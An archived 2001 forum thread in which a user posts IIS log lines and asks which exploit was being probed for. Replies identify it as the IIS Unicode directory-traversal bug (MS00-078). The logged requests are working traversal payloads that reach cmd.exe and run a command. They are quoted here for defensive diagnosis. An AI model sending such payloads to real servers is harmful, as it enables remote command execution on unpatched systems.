//flex table opened by JP
PDA

Click to See Complete Forum and Search --> : Which exploit from this clip in an IIS log?

DVNT1
06-05-2001, 04:25 AM
I'm trying to determine which exploit is being probed for...

#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)
2001-06-03 22:35:32 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 190 HTTP/1.0 - - - -
2001-06-03 22:35:32 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 20 HTTP/1.0 - - - -
2001-06-03 22:35:44 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 500 87 60 HTTP/1.0 - - - -
2001-06-03 22:35:48 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 500 87 20 HTTP/1.0 - - - -
2001-06-03 22:35:48 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 500 87 10 HTTP/1.0 - - - -
2001-06-03 22:35:48 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 500 87 10 HTTP/1.0 - - - -
2001-06-03 22:35:49 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 123 30 HTTP/1.0 - - - -
2001-06-03 22:35:49 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 10 HTTP/1.0 - - - -
2001-06-03 22:35:51 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 3 60 HTTP/1.0 - - - -
2001-06-03 22:35:51 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 20 HTTP/1.0 - - - -
2001-06-03 22:35:52 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir 404 3 40 HTTP/1.0 - - - -
2001-06-03 22:35:52 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir 404 3 50 HTTP/1.0 - - - -
2001-06-03 22:35:54 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir 404 3 40 HTTP/1.0 - - - -
2001-06-03 22:35:54 202.235.83.207 - W3SVC1 DVNT1 192.168.X.X 80 GET /winnt/system32/cmd.exe /c+dir 404 3 20 HTTP/1.0 - - - -
smokin1
06-05-2001, 07:20 AM
Hi
Looks like they were trying to exploit the IIS Unicode bug. There was a patch issued in January I think.
Cheers
http://www.sysopt.com/forum/smile.gif
DVNT1
06-05-2001, 08:29 AM
I thought it might be the “Web Server Folder Traversal” vulnerability (MS00-078) because of the GET involving the string “/../”.

smokin1, I remember reading about a problem with unicode in the description but so far I haven't found it again. Any more details would be appreciated.
smokin1
06-05-2001, 02:56 PM
Hi again..I'm at work, and most of the info I have on that exploit is at home..but here is a partial explanation.
http://www.infowar.com/iwftp/xforce/advise68.shtml
DVNT1
06-05-2001, 04:00 PM
Great! The links to the patches in that artical point to the “Web Server Folder Traversal” vulnerability which backs up what I was thinking.

Thanks!
psyklone
06-05-2001, 07:32 PM
yeah, looks like the unicode exlpoit to me ... that one hit pretty heavy several months back. i hope all is well ...